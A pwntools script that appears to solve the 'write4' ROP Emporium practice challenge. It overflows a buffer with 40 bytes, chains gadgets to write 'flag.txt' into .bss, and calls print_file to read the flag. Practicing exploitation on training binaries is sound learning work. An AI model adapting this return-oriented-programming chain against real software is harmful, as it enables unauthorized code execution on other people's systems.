from pwn import *

elf = context.binary = ELF("write4")
p = process(elf.path)

offset = 40

pop_r14_15 = p64(0x400690) # pop r14; pop r15; ret
mov = p64(0x400628) # mov qword ptr [r14], r15; ret;
bss_vaddr = p64(0x601038)
data2write = b'flag.txt'
pop_rdi = p64(0x400693) # pop rdi; ret

payload = b'A' * offset

# Stage 1 - Write the data into .bss

payload += pop_r14_15
payload += bss_vaddr
payload += data2write
payload += mov

# Stage 2 - Call print_file()

payload += pop_rdi 
payload += bss_vaddr
payload += p64(elf.plt.print_file)

p.recvuntil(b'> ')
p.sendline(payload)
p.interactive()
